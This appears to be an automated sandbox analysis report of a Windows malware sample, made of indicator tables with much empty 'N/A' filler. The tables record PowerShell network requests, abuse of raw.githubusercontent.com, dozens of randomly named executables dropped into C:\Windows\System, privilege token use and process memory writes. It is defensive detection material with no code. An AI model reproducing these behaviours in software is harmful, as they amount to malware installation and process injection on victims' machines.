N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\dekFayz.exe N/A
N/A N/A C:\Windows\System\hGlZwCN.exe N/A
N/A N/A C:\Windows\System\WaSMBHp.exe N/A
N/A N/A C:\Windows\System\MHBleQE.exe N/A
N/A N/A C:\Windows\System\ytwlPrq.exe N/A
N/A N/A C:\Windows\System\LoLEqyl.exe N/A
N/A N/A C:\Windows\System\vapxwfh.exe N/A
N/A N/A C:\Windows\System\ayLcyMh.exe N/A
N/A N/A C:\Windows\System\fgrtKfx.exe N/A
N/A N/A C:\Windows\System\aafPeZy.exe N/A
N/A N/A C:\Windows\System\XmAibUO.exe N/A
N/A N/A C:\Windows\System\xbiLSzP.exe N/A
N/A N/A C:\Windows\System\ybOctUF.exe N/A
N/A N/A C:\Windows\System\ummmPka.exe N/A
N/A N/A C:\Windows\System\UTxxzDH.exe N/A
N/A N/A C:\Windows\System\GJdWVCN.exe N/A
N/A N/A C:\Windows\System\mKaqiDk.exe N/A
N/A N/A C:\Windows\System\ziGqRsS.exe N/A
N/A N/A C:\Windows\System\mGKGJjv.exe N/A
N/A N/A C:\Windows\System\yLiJdvj.exe N/A
N/A N/A C:\Windows\System\JTqtaXk.exe N/A
N/A N/A C:\Windows\System\OIUAimD.exe N/A
N/A N/A C:\Windows\System\aGnqBQm.exe N/A
N/A N/A C:\Windows\System\ywMqHsX.exe N/A
N/A N/A C:\Windows\System\wGFQQMu.exe N/A
N/A N/A C:\Windows\System\pGWkFmP.exe N/A
N/A N/A C:\Windows\System\TRIFEVO.exe N/A
N/A N/A C:\Windows\System\zRdjWIB.exe N/A
N/A N/A C:\Windows\System\JWnEiLH.exe N/A
N/A N/A C:\Windows\System\zIeGbca.exe N/A
N/A N/A C:\Windows\System\HFtCfxV.exe N/A
N/A N/A C:\Windows\System\sCBvpsg.exe N/A
N/A N/A C:\Windows\System\IJGzTPM.exe N/A
N/A N/A C:\Windows\System\pjAYEpB.exe N/A
N/A N/A C:\Windows\System\cXMdQND.exe N/A
N/A N/A C:\Windows\System\TgjMzCg.exe N/A
N/A N/A C:\Windows\System\sVKlkFy.exe N/A
N/A N/A C:\Windows\System\UIdOQVF.exe N/A
N/A N/A C:\Windows\System\NMsEiji.exe N/A
N/A N/A C:\Windows\System\mZApmKJ.exe N/A
N/A N/A C:\Windows\System\qtnlkHL.exe N/A
N/A N/A C:\Windows\System\ifdjeKE.exe N/A
N/A N/A C:\Windows\System\IzNMtHC.exe N/A
N/A N/A C:\Windows\System\yHvyUpJ.exe N/A
N/A N/A C:\Windows\System\ZrLCwWl.exe N/A
N/A N/A C:\Windows\System\FEBDcIm.exe N/A
N/A N/A C:\Windows\System\AhYStJy.exe N/A
N/A N/A C:\Windows\System\dywivGJ.exe N/A
N/A N/A C:\Windows\System\NCuxfsF.exe N/A
N/A N/A C:\Windows\System\mvgAMak.exe N/A
N/A N/A C:\Windows\System\OYJUGKc.exe N/A
N/A N/A C:\Windows\System\JNqNXxo.exe N/A
N/A N/A C:\Windows\System\sQqvxeE.exe N/A
N/A N/A C:\Windows\System\DoylLfV.exe N/A
N/A N/A C:\Windows\System\beWuCxU.exe N/A
N/A N/A C:\Windows\System\aWcYzbp.exe N/A
N/A N/A C:\Windows\System\bbvzrQb.exe N/A
N/A N/A C:\Windows\System\iuckmmz.exe N/A
N/A N/A C:\Windows\System\rhYKiKB.exe N/A
N/A N/A C:\Windows\System\glLdtNv.exe N/A
N/A N/A C:\Windows\System\PCgwKkO.exe N/A
N/A N/A C:\Windows\System\QXhIKRE.exe N/A
N/A N/A C:\Windows\System\ftAEUYb.exe N/A
N/A N/A C:\Windows\System\YeRXevo.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\BMInhEQ.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\EYImDNq.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\tjLyASq.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\HJCshyL.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\PpaZyko.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\EHuDyUm.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\OYJUGKc.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\sTRENVr.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\gvQpTxI.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\qDJrcnr.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\Bxqlsgb.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\HJFadLg.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\dywivGJ.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\aIZoheH.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\AdEPYPz.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\fwuHviY.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\NBOxZCd.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\MLzNIca.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\xpIjVUq.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\PwpVxxU.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\jOclvUi.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\dekFayz.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\UTxxzDH.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\UUWrgnG.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\fOCcONw.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\vfYwAIg.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\YRQqIqG.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\DvKGQWq.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\IywPwdR.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\iMHbHjy.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\UCjDCiV.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\UyywTzM.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\XtJfgnj.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\GXjWkjO.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\BLdgwPH.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\gCNijaJ.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\uDsbzVE.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\ZgrFmJO.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\blaNIgr.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\PSWhQGM.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\ncmMjyb.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\kLXQyHj.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\CyHiuoZ.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\wYjLdpS.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\DHmjzGN.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\RpVZcbl.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\iVuipMk.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\yLiJdvj.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\DNVsdiv.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\YvoYTGH.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\OVYvkyz.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\WaSMBHp.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\xbiLSzP.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\XHajisx.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\ElIViwh.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\UcceuQy.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\cwrWZkg.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\SUvWazJ.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\JtZstzg.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\wSaaSMR.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\jeASQIh.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\tdoIjvL.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\dnMTPdI.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
File created C:\Windows\System\ESPkjhT.exe C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wermgr.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\wermgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3280 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3280 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3280 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\dekFayz.exe
PID 3280 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\dekFayz.exe
PID 3280 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\WaSMBHp.exe
PID 3280 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\WaSMBHp.exe
PID 3280 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\hGlZwCN.exe
PID 3280 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\hGlZwCN.exe
PID 3280 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\MHBleQE.exe
PID 3280 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\MHBleQE.exe
PID 3280 wrote to memory of 756 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\LoLEqyl.exe
PID 3280 wrote to memory of 756 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\LoLEqyl.exe
PID 3280 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\ytwlPrq.exe
PID 3280 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\ytwlPrq.exe
PID 3280 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\vapxwfh.exe
PID 3280 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\vapxwfh.exe
PID 3280 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\ayLcyMh.exe
PID 3280 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\ayLcyMh.exe
PID 3280 wrote to memory of 3920 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\fgrtKfx.exe
PID 3280 wrote to memory of 3920 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\fgrtKfx.exe
PID 3280 wrote to memory of 724 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\aafPeZy.exe
PID 3280 wrote to memory of 724 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\aafPeZy.exe
PID 3280 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\XmAibUO.exe
PID 3280 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\XmAibUO.exe
PID 3280 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\xbiLSzP.exe
PID 3280 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\xbiLSzP.exe
PID 3280 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\ybOctUF.exe
PID 3280 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\ybOctUF.exe
PID 3280 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\ummmPka.exe
PID 3280 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\ummmPka.exe
PID 3280 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\UTxxzDH.exe
PID 3280 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\UTxxzDH.exe
PID 3280 wrote to memory of 3408 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\GJdWVCN.exe
PID 3280 wrote to memory of 3408 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\GJdWVCN.exe
PID 3280 wrote to memory of 2368 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\mKaqiDk.exe
PID 3280 wrote to memory of 2368 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\mKaqiDk.exe
PID 3280 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\ziGqRsS.exe
PID 3280 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\ziGqRsS.exe
PID 3280 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\mGKGJjv.exe
PID 3280 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\mGKGJjv.exe
PID 3280 wrote to memory of 680 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\yLiJdvj.exe
PID 3280 wrote to memory of 680 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\yLiJdvj.exe
PID 3280 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\JTqtaXk.exe
PID 3280 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\JTqtaXk.exe
PID 3280 wrote to memory of 3248 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\OIUAimD.exe
PID 3280 wrote to memory of 3248 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\OIUAimD.exe
